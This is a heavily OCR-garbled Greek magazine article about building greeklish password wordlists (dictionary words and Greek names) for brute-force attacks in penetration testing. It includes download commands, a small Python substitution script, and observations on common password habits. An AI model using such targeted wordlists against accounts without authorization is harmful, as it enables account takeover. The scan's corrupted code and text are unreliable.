ο ανθρώπινος na- 
ράγοντας αποδει- 
κνύεται ως ο ΠΙΟ 
αδύναμος κρίκος 
στην ασφάλεια των 
συστημάτων. 
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Σ’ auró και σε επὀµενα ἄρθρα eni του θέματος φιλοδοξούμε va σας δεἰ- 
ξουμε nog va φτιάχνετε τα δικἁ σας wordlists, τα οποία θα εἶναι ὁσο 
το δυνατὸν καλύτερα προσαρμοσμένα στις συνήθειες των Ελλήνων χρη- 
στῶν. Εἱμαστε βέβαιοι ὁτι, πολύ σύντομα, θα διαπιστώσετε πως η δη- 
μιουργία ενὸς καλού wordlist εἶναι µια διαδικασία απείρως πιο ενδιαφἑ- 
pouoa και διασκεδαστικἠ, anó το ἰδιο ro brute forcing! Πράγματι, μετὰ 
τη δηµιουργία ενὸς καλού wordlist, το brute force attack που ακολουθεἰ 
εἶναι µια μάλλον ανιαρἠ διαδικασία... 


Το φάσμα rou Penetration Testing σε συστήµατα εἶναι ιδιαιτερα ευρύ. 
Υπάρχουν πολλὰ και πολὺ διαφορετικά γνωσιακἀ πεδία που πρέπει να 
κατέχει κάποιος, προκειμένου να µπορεί να κάνει ἑνα αποτελεσματικὀ 
pentest. H λογική του penetration testing ξεκινάει απὀ τους κανόνες, τη 
μεθοδολογία, τις npakrik£g και τις διαδικασίες που πρέπει να ακολουθεὶ 
o pentester, WOTE στο τέλος να αποκτήσει µια ολοκληρωμένη εικὀνα για 
τις αδυναμἰες ενὸς συστήματος. 
Privilege escalation και το αιώνιο πρὀβλημα µε τα 
passwords 


Ειδικἀ ὁσον αφορά στο λεγόμενο privilege escalation, o pentester χρη- 
σιμοποιεὶ λογισμικὀ µε το οποίο προσπαθεἰ, ουσιαστικά, va μαντέψει TO 
password ενός χρήστη, ο οποίος ενδέχεται va 'ναι ακόµη κι ο διαχειρι- 
στἠς TOU συστἠµατος-στὀχου. 


Ας µη γελιόμαστε. Τα αδύναμα (weak) passwords ἦταν, εἶναι και θα na- 
ραμεἰνουν µια απὀ τις κύριες αδυναμίες ασφάλειας στα συστήματα yevi- 
κότερα. Όσο αποτελεσματικἀ και αν ἐχει διασφαλίσει το δἰκτυὀ του απὀ 
εξωτερικούς κινδύνους ο υπεύθυνος διαχειριστής, av οι χρήστες εἰναι 
απρὀσεκτοι και αδιάφοροι για την ασφάλεια του υπολογιστή τους τότε 
το εσωτερικὀ δίκτυο θα εἶναι ἑνας χώρος-πάρτι -- για λίγους ἡ ακόµη 
και πολλούς. Σε αρκετὲς περιπτώσεις, δεν υπάρχουν καν passwords. Σε 
ἄλλες, πρὀκειται για ακολουθἰες αριθμών ἡ απλές, εὐκολα va μαντευτούν 
λέξεις, ὁπως "12345", "123456", "password" κ.ο.κ. Άλλες φορὲς o κωδι- 
κὸς καθορίζεται απὀ το ἰδιο το username, όπως, N.X., username-anna 
και password-anna91. E% καταλαβαίνουμε ὁτι η μικρὴ Αννούλα έβαλε 
τη φαντασία της να δουλέψει. Έτσι, δίπλα στο username της κόλλησε το 
"91" ro οποίο, κατὰ πᾶσα πιθανότητα, προέρχεται απὸ το 1991 και εἶναι το 
ἐτος γεννἠσεώς της. Μπράβο Ἄννα, αυτό θα δυσκολέψει onpavrikà τον 
pentester και σίγουρα θα κρατήσει μακρυὰ τους επίδοξους εισβολεἰς :Ρ 


Κακά τα ψέμματα. O ανθρώπινος παράγοντας για ἄλλη µια φορά αποδει- 
κνύεται ως ο ποιος αδύναμος κρίκος στην ασφάλεια των συστημάτων. 
Φανταστείτε ropa ἑναν υπεύθυνο ασφαλείας, ο οποίος το γνωρίζει πολύ 
καλά auró και μάλιστα ἐχει καεὶ αρκετὲς φορές απὸ τα καμώματα των 
χρηστών. Αποφασίζει ἐτσι να μοιράσει σε όλους τυχαία παραγμένους, 


Y JEIE- NES 


WHordlist Generation 
WT 


ισχυρούς κωδικοὺς που συνδυάζουν πεζά, κεφαλαία, ειδικἁ σύμβολα, 
αριθµητικἁ ψηφία -- κι επιπρόσθετα ἐχουν ικανὸ μήκος (τουλάχιστον 12 
χαρακτήρες). Οι κωδικοί αυτοί εἶναι αρκετἁ ισχυροί αλλά ¿xouv ἑνα ἄλλο, 
ünouAo πρὀβλημα: Εἶναι δύσκολο va αποστηθἰζονται. Έτσι, μετά anó 
λίγο, απηυδισμένοι οι χρήστες αρχίζουν να βρίσκουν διάφορες πατέντες 
ώστε να θυμούνται τα ισχυρά, κατά τα ἄλλα, passwords: Τους γράφουν 
σε xaprákia τα οποία βάζουν σε κάποιο (εὐκολα παραβιάσιμο) συρτάρι, 
κάτω απὀ το πληκτρολόγιο -- ακόµη και σε postit, πρακτικἁ σε κοινὴ θέα! 


Our) Bia 

Υπάρχει µια πληθώρα εργαλείων nou χρησιμοποιούνται yia την εὐρεση 
passwords µε τη μέθοδο rou brute force, δηλαδἠ µε την εξαντλητικἠ 
δοκιμή κωδικών ἑως ότου βρεθεἰ ο σωστὸς ἡ oc ro σημείο που θα ¿xouv 
δοκιµαστεἰ ὁλοι οι διαθέσιμοι κωδικοί/συνδυασμοἰ. Τα εργαλεἰα του εἰ- 
δους χρησιμοποιούνται κατά routers, web/FTP/mail/VPN/SSH servers, 
hash dumps, wireless networks κ.ο.κ., µε τις αντίστοιχες επιθέσεις να 
χαρακτηρίζονται ως online ἡ offline. Τώρα, ανεξάρτητα απὀ την ποιότη- 
τα ενὸς προγράµµατος brute force, η αποτελεσµατικότητα µιας επίθεσης 
εξαρτάται κυρίως απὀ το πόσο καλὴ εἶναι η λίστα (wordlist) ἡ αλλιώς το 
λεξικὀ (dictionary) nou συμβουλεύεται ro πρὀγραμμα, προκειµένου να 
δοκιμάζει κωδικούς. Εἶναι νομίζουμε προφανὲς ὁτι ἑνα πρὀγραμμα brute 
force συμβουλεύεται αναγκαστικἀ µια τέτοια wordlist, αφού av δοκἰμαζε 
κωδικούς στην τύχη τότε η πιθανότητα επιτυχίας θα ἦταν λίγο μεγαλύτε- 
pn anó την πιθανότητα να βάλεις ἑνα πιθηκἀάκι μπροστὰ anó το πληκτρο- 
λόγιο και να περιμένεις ὁτι, δια των τυχαίων χτυπημάτων, θα σου γράψει 
το παρὸν κείμενο ¿wG εδώ, µε ἡ χωρἰς το “εδώ”. Προφανώς, λοιπὸν, κάθε 
πρὀγραμμα brute force τερματίζει επιτυχὼς αν και μόνον αν ο ζητούμενος 
κωδικός βρίσκεται στη wordlist nou συμβουλεύεται. 


Τώρα, η συλλογή πληροφοριών και το social engineering αποτελούν 
σημαντικἁ µέρη της διαδικασίας κατασκευἠς µιας *kaAric* wordlist. O 
επιτιθέμενος πρέπει να γνωρίζει πολὺ καλὰ το στόχο του, πριν ακόµα KA- 
ταπιαστεἰ µε την κατασκευὴ της λίστας. Έτσι, αυξάνονται θεαματικὰ και 
οι πιθανότητες yia ἑνα επιτυχημένο bruteforce. Το κυνήγι του κωδικού 
(password hunt) εἶναι µια cuvapnaorikr| διαδικασία, που πολλὲς φορὲς 
ειλικρινά δεν θέλεις να τελειώσει. Αφού βρεις τον κωδικό, λυπάσαι αν το 
κυνήγι τελείωσε γρήγορα και σίγουρα αισθάνεσαι δέος και σεβασμὀ, av o 
κωδικός ἦταν δύσκολος. 


Στο σημείο auró και πριν συνεχίσουμε, οφείλουμε να υπογραμμίσουμε 
εμφατικὰ ὁτι ο penetration tester πρέπει va ἐχει σύμβαση και ειδικἠ ἄδεια 
anó την εταιρεία στην οποία πραγµατοποιεἰ το pentest. Μόνον ἐτσι ano- 
φεύγονται n8ikà και νομικά προβλήματα, τα onoia ενδέχεται va οδηγἠ- 
gouv ακόµη και στα δικαστήρια. Ό,τι παρουσιάζουμε στο napóv άρθρο 
ἐχει 110% εκπαιδευτικὀ χαρακτήρα και µόνο. 


Διαρροές passwords και κἄποια πολύ ενδιαφέροντα ou- 
μπεράσματα 


Κατά καιρούς πραγματοποιούνται επιθέσεις σε web sites και βάσεις δε- 
δομένων εταιριών, απὀ τις οποἰες προκύπτουν πολλά και αξιοπρὀσεκτα 
συμπεράσματα. Η 5οηγ, για παράδειγµα, δέχθηκε ἑνα τεράστιο πλήγμα 
τον Απρίλιο του 2011, ὀπου οι attackers διεἰσδυσαν στους servers της 
εταιρἰας και ἐκλεψαν προσωπικἁ δεδομένα 24,6 εκατομμυρίων χρηστῶν 
avà τον κόσμο. H ομάδα LulzSec δημοσίευσε τα αποτελέσµατα µέσω 
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BitTorrent, αποκαλύπτοντας ra στοιχεία 200.000 χρηστὠν. Μετὰ anó 
στατιστικἠ ανάλυση προέκυψαν τα ακόλουθα, εξαιρετικἀ ενδιαφέροντα 
αποτελέσµατα: 


1. Οι περισσότεροι ἄνθρωποι χρησιμοποιούν το ἰδιο ζεύγος 
«username, password» σε πολλούς λογαριασμούς (Gmail, 
PayPal, online bank accounts, eBay κ.λπ.) 


2. Ta passwords του 99% των χρηστῶν περιέχουν μόνο αλφα- 
ριθμητικούς χαρακτήρες, àpa το 99% των passwords δεν εἶναι 
περισσότερο πολύπλοκα απὀ τα Nikos123, sex6969, summer, 
805123, qwerty, qwerty1 k.à. 


3. Oi περισσότεροι χρήστες μοιράζονται το iðio password. Kol- 
νοὶ κωδικοί anó το Sony Online Entertainment ἦταν οι εξἠς: 
seinfeld, password, 123456, princess, peanut, shadow, ginger, 
Michael, sunshine, tigger, bailey. 


4. Οι περισσότεροι χρήστες χρησιμοποιούν passwords μήκους 
anó 6 ἑως 8 χαρακτήρων. Σε μικρότερο βαθμὸ χρησιμοποι- 
οὗνται passwords απὀ 9 έως 10 χαρακτήρες, πολὺ λίγοι χρή- 
στες ἐχουν passwords το πολύ μήκους 5, ενώ ακόµα λιγότεροι 
ἐχουν passwords µήκους 12 και πλἐον χαρακτήρων. 


Συμπεράσματα: Οι ἄνθρωποι δεν αισθάνονται κάποιον ιδιαίτερο Kiv- 
δυνο µε την επιλογἠ των passwords, δεν βάζουν τη φαντασία τους va 
δουλέψει και σίγουρα δεν κάνουν τον κὀπο να χρησιμοποιήσουν ειδικούς 
χαρακτήρες, ὁπως !, Q, 4, $, 9o, ^, &, * κ.ο.κ. Με λίγα λόγια, οι κωδικοί 
της μεγάλης πλειονότητας των χρηστῶν εἶναι σχετικἁ εὐκολο va µαντευ- 
τούν -- και φυσικὰ οι attackers εκμεταλλεύονται το γεγονός. 


Wordlists µε greeklish 


Στο Internet υπάρχουν λίστες µε τα πιο συχνά χρησιμοποιούμενα 
passwords. Αυτές οι λίστες όμως δεν αφορούν ειδικἁ στους Έλληνες 
χρήστες -- ἡ ακριβέστερα στις ελληνικἐς συνήθειες. Πράγματι, ¿vag Ἑλ- 
ληνας εἶναι πολύ πιθανὀ να Χρησιμοποιεί greeklish για ra passwords κι 
ὀχι αγγλικὲς λέξεις. Ελάτε λοιπὸν να φτιάξουμε δύο λίστες: H pia θα nepi- 
λαμβάνει ὀλεςτις λέξεις ενὸς ελληνικού λεξικού σε greeklish, ενώ η ἄλλη 
(σχεδὀν) όλα τα ελληνικά ονόματα -- επἰσης σε greeklish. 


Hia αρχἠ χρειαζόμαστε ἑνα ψηφιοποιημένο, ελληνικὀ λεξικὀ. Από την 
ακόλουθη σελίδα rou OpenOffice 


www.openoffice.org/el/about-spellcheck.html 
παίρνουμε ro αρχείο εἰ GR.zip, το απευθεἰας URL του οποίου εἶναι αυτό: 
http://elspell.math.upatras.gr/files/ooffice/el GR.zip 


Αφού αποσυμµπιέσουµε το εἰ GR.zip| το αρχείο nou µας ev- 
διαφέρει εἶναι το εἰ GR.ic. Περιλαμβάνει 58857» δία- 
φορετικὲς λέξεις και νομίζουμε ὁτι για αρχή εἶναι καλὸ :Ὁ 
Πρέπει βέβαια να το μετατρέψουμε σε greeklish και γι’ αυτό χρειαζὀ- 
μαστε ἑνα script σε BASH, Python, Perl ἡ ónoia ἄλλη σκριπτογλὠσσα 
προτιμάμε, τέλος πάντων. Ένα τέτοιο script εἶναι το pygr2gl, rou l'iopyou 
Νοταρά. Αλλά ας δούμε noc εργαζόµαστε κάτω απὀ το αγαπημένο µας 
Unix-like OS -- αρκεἰ να έχει εγκατεστημένη την Python κι ¿va εργαλείο 
σαν το wget: 
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$ wget http://elspell.math.upatras.gr/files/ooffice/el GR.zip 
[x] 

HTTP request sent, awaiting response... 200 OK 

Length: 1532950 (1.5M) [application/zip] 

Saving to: 'el GR.zip 


100X[---------------------------------5] 1,532,950  1.18M/s 
in 1.2s 


2012-03-08 10:51:21 (1.18 MB/s) - 61 GR.zip' saved 
[1532950/1532950] 


$ unzip el GR.zip 
Archive: el GR.zip 
inflating: el GR.aff 
inflating: el GR.dic 
inflating: README el GR.txt 
$ wget http://www.g-loaded.eu/packages/pygr2gl/pygr2gl-0.1.tar.gz 
Γιο] 
HTTP request sent, awaiting response... 200 OK 
Length: 9434 (9.2K) [application/x-gzip] 
Saving to: '"pygr2gl-0.1.tar.gz 


χθοχ[---------------------------------»] 9,434 27.7K/s 
in 0.3s 


2012-03-08 10:57:14 (27.7 KB/s) - '"pygr2gl-0.1.tar.gz' saved 
[9434/9434] 


$ tar zxvf pygr2gl-0.1.tar.gz 

x pygr2g1-0.1/ 

x pygr2gl-0.1/README 

X pygr2gl-0.1/test iso8859-7.txt 

x pygr2gl-0.1/test utf-8.txt 

x pygr2gl1-0.1/COPYING 

x pygr2gl-0.1/pygr2gl 

$ python pygr2gl-0.1/pygr2gl el GR.dic » greeklish.dic 


Και µε την τελευταία εντολἠ παίρνουμε το πρώτο, ωραιότατο και nÀnp£- 
στατο wordlist µας σε greeklish! Αν ανοίξουμε ro greeklish.dic µε κάποιον 
text editor και το παρατηρήσουμε, θα δούμε ὁτι μερικἁ γράμματα ¿xouv 
αντικατασταθεί anó αριθμούς. Πράγματι, το εργαλεἰο pygr2gl κἀνει τις 
ακὀλουθες αντιστοιχἰσεις: 


(6, ξ, ψ, e, Ξ» V) eT» (8, 3, 4, 8, 3, 4) 


Προφανώς και δεν πρὀκειται yia µια 1-1 αντιστοίχιση, δηλαδή. O rpó- 
πος αυτός μετατροπής ἐχει ἑνα βασικὀ μειονέκτημα. Όπως μπορούμε να 
δούμε και στη συνάρτηση get. conversion. pool() του pygr2gl, δεν uno- 
ρούμε va αντιστοιχίσουµε δύο χαρακτήρες σε ἑναν. Κι auró θα θέλαμε 
να το κάνουμε γιατὶ συχνὰ στα greeklish γράφουμε µε φθόγγους κι ὀχι 
µε αριθμούς. Έτσι, avri στη θέση των 6, € kai y να βάζουμετα 8, 3 και 4 
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αντίστοιχα, στην πράξη βάζουμε ra th, ks και ps. Ma παράδειγµα, τη λέξη 
«θεός” δεν τη γράφουμε πάντα ως "8eos», αλλά πολύ συχνά ως "theos». 
To πρόβλημα αυτὀ αντιμετωπίζει το ακὀλουθο script, επἰσης σε Python: 
il/usr/bin/env python 
4letter changer.py by ἠγῷρ 
import sys 
def replace chars(line,dic words): 
for i,j in dic words.iteritems(): 
line-line.replace(i,j) 
return line 
letters-('8':'th','3':'ks','4':'ps') 
f-sys.argv[1] 
filename-open(f , 'r*) 
for line in filename: 
new line-replace chars(line,letters) 
print new line, 
filename.close() 
Πληκτρολογούμε το script σ’ £vav text editor και το αποθηκεύουµε pe T’ 
ὀνομα letter changer.py. lia va πάρουμε τη νέα wordlist µε τους φθὀγ- 
γους, ξεκινώντας απὀ εκεἰνη που µας ἐδωσε το pygr2gl, αρκεἰ να δώσου- 
µε το ακὀλουθο: 


$ python letter changer.py greeklish.dic » final greeklish.dic 


Μπορείτε va πειραματιστείτε περαιτέρω φτιάχνοντας εναλλακτικὲς 
wordlists, ónou θα ¿xouv λάβει χώρα κι ἄλλες αντικαταστάσεις. Πα napá- 
δειγµα, τα h και u θα αντικαθίστανται anó το i, TO w απὀ το ο, το ai απὀ 
TO € κ.ο.κ. 


Χρωστάμε ὅμως va φτιάξουμε και µια wordlist µε όλα τα ελληνικά ονόµα- 
τα -- κι αυτή σε greeklish. Anó noù ξεκινάμε; Στα ακόλουθα site 


www. foundalis.com/grk/EllinikaOnomata.html 
http://users.sch.gr/kassetas/Names3.htm 


δημοσιεύονται έρευνες µε ονόματα nou χρησιμοποιούνται στην Ελλάδα. 
Επιλέγουµε Ó,ri θέλουμε και κάνουμε επικὀλληση στο Excel. Απομονώ- 
νουµε τα ονόματα και τα επικολλούµε σ’ ἑνα νέο φύλλο Excel, ro onoio 
και αποθηκεύουµε ως .txt. Κατ’ auróv τον τρόπο έχουμε ἑνα πρὠτο text 
file u^ όλα τα ελληνικά ονόματα. H συνέχεια εἶναι μάλλον προφανής: Με 
χρήση των pygr2gl και letter. changer.py παίρνουμε την τελικἠ λίστα µε 
όλα τα ελληνικά ονόματα σε greeklish. Βεβαίως, αλλάζοντας ro letters 
στο letter changer.py, πραγματοποιούµε κι ὁτι προσαρμογές κρίνουμε 
ως απαραίτητες. Προσθέτοντας, n.x., το 'W':'O', εἶναι σαν να ορίζουμε την 
αντικατάσταση των Ω απὀ Ο. 


Δημιουργία αποτελεσματικών world lists 


Οι κἀτοικοι κᾶθε χώρας ἐχουν το δικὀ τους rpóno ζωής, τις δικὲς τους 
συνήθειες και τις δικὲς τους ιδιαιτερότητες. Οι παρατηρήσεις αυτὲς θα 
μπορούσαν μάλιστα va εξειδικευτούν για διαφορετικἐς περιοχὲς της ἰδιας 
χώρας. Όπως και να χει, το γεγονὸς αυτό επηρεάζει και τον τρόπο που 
λειτουργούν σε ὁλες τις πτυχὲς της ζωής τους, απὀ το πιο ασήμαντο 
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πράγμα £o ro nio σημαντικὀ. O τομέας της ασφάλειας συστημάτων και 
δικτύων, δεν θα μπορούσε ν΄ αποτελεἰ εξαἰρεση. Από σχετικὲς έρευνες 
ἐχει παρατηρηθεί ότι τα passwords που Χρησιμοποιεί τουλάχιστον TO 
7096 των Ελλήνων χρηστῶν xouv κοινὰ χαρακτηριστικἀ. Ακολουθούν 
μερικὰ παραδείγματα. 


e χρήση rou εργοστασιακού κωδικού του Wireless router 


e χρήση του τηλεφώνου, σταθερού ἡ κινητού, ως password στον 
wireless router ἡ στο αντίστοιχο user account του υπολογιστή 


e passwords που εἶναι το μικρὸ -ἡ ακὀµη και το χαϊδευτικό- ὀνομα 
της σχέσης (Σ.Τ.Ε. Λογικά, δηλαδή, το «zouzounaki» πρέπει va nai- 
ζει πολύ!) 


e passwords που προέρχονται απὀ το ὀνομα κάποιου κατοικἰδιου, 
ὀνομα παιδιού, ημερομηνία αρραβώνα, ημερομηνία γέννησης nai- 
διοὐ 


ο σε πολύ μικρότερο ποσοστὸ, τα passwords εἶναι το ὀνομα της εται- 
ρείας στην οποία εργάζεται ο χρήστης 


Εἶναι προφανὲς, λοιπὸν, ὁτι δεδοµένα σαν τα προαναφερθέντα πρέπει va 
λαμβάνονται υπόψη κατὰ τη δημιουργία ενὸς αποτελεσματικού για TOV 
πληθυσμὸ wordlist -- ἡ ἑστω ενὀς wordlist nou εἶναι αποτελεσµατικὀ για 
ἑνα υποσύνολο του πληθυσμού. 


Κακὰ τα ψέμματα. Κάθε καλὰ ορισμένο υποσύνολο του πληθυσμού, N.X., 
µε βάση την ηλικἰα, τον τόπο κατοικίας, το µορφωτικὀ επἰπεδο κ.ο.κ., 
αποτελεί µια ξεχωριστή περίπτωση. Ως τέτοια, ο επαγγελματίας pentester 
οφείλει να την αντιμετωπίζει µε ιδιαίτερη προσοχἠ. Πα va το πούμε κι 
αλλιώς, δεν υπάρχει κλειδὶ που να ξεκλειδώνει όλες τις πόρτες. Θα uno- 
ρούσε βέβαια κάποιος να ισχυριστεί ὁτι αν ο pentester ἐχει φτιάξει µια 
τεράστια wordlist µε βάση όλα ὁσα εἶναι γνωστὰ για τον πληθυσμὀ, τότε 
θα εἶχε μεγάλες πιθανότητες επιτυχίας. H σκέψη εἶναι σωστή, μόνο nou 
παραβλέπει τον παράγοντα του χρόνου: Σε πολλά σενάρια pentesting 
δεν διατίθεται απεριόριστος Χρόνος. Επομένως avri για µια καθολικἠ 
wordlist nou Ἐενδεχομένως3 περιέχει το ζητούμενο password, πρέπει να 
Χρησιμοποιείται µια κατάλληλα επιλεγμένη, μικρότερη wordlist. Σε κάθε 
περίπτωση, n επιτυχἰα δεν εἶναι δυνατὸν va θεωρείται δεδομένη. H qpó- 
viun επιλογή wordlist, óuoc, σημαίνει αυξημένες πιθανότητες επιτυχίας 
σε ρεαλιστικἐς συνθήκες. 


H συναρπαστικἠ συνέχεια 


Στο παρὀν μόλις nou αγγἰξαμε την κορυφὴ του παγὀβουνου που λέγεται 
Wordlist Generation. Ξέρουμε τι θα λέτε ropa. Ότι υπάρχουν va σωρό 
παγόβουνα, µε ¿va σωρὀ ευφάνταστα ονόματα. Δεν ἐχετε ἀδικο, η pE- 
ταφορὰ όμως που μόλις κάναμε εἶναι ακριβέστατη. Στο επόμενο τεύχος, 
n.x., θα σας δείξουμε nog να φτιάχνετε wordlists οι λέξεις των οποίων 
θα σχηματίζονται µε βάση συγκεκριμένους κανόνες, οι οποίοι µε τη σειρἀ 
τους θα αντικατοπτρίζουν ògo το δυνατὸν καλύτερα τις συνήθειες των 
υποψηφίων στόχων. Προς το παρὸν σας αφήνουμε να δοκιμάσετε --nà- 
ντα σε εργαστηριακἐς συνθήκες-- τα greeklish wordlists που φτιάξαμε. 
A, κι αν δεν ἐχετε ιδέα για το πὠς µπορείτε va τα δοκιμάσετε, ¿va θα σας 
πούμε: Υπομονὴ, ὁλα θα τα εξηγήσουμε, όλα θα γίνουν! 


Μεταξύ των θεμάτων του περιοδικού nou δεν εἶμαστε σε 
θέση ν΄ ανακοινώσουμε ακόµα, θα βρείτε το τρίτο μέρος 
της σειράς πάνω στο πώς δουλεύουν τα δίκτυα. To εν 
λόγω ἆρθρο ελλείψει χώρου δεν δημοσιεύτηκε στο 
παρὸν τεύχος. Στο επόμενο τεύχος, λοιπὸν, εξηγούμε 
αναλυτικἁ τη λογικἠ του subnetting, ὥστε να µην 

έχετε ποτὲ ξανὰ απορία, π.χ., για το ρόλο αυτών των 
μυστήριων subnet masks! 
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H διαφήμισή σας θα 
μπορούσε va εἶναι εδώ. 


Θα μπορούσε να 'ναι και σε κάποια άλλη σελίδα, δηλαδή. 


Αλλά δεν &ivai. 


Προς το παρόν. 


niveis µας ΞΕ DOUME a ΞΕΡΕΤΕ m 
ξε POUE m ξέρετε « wee va κάνετε. 


Μην ντρέπεστε, λοιπόν. 


talk2usQdeltahacker.gr 


Εμείς πάντως θα σας μιλήσουμε. (3) 
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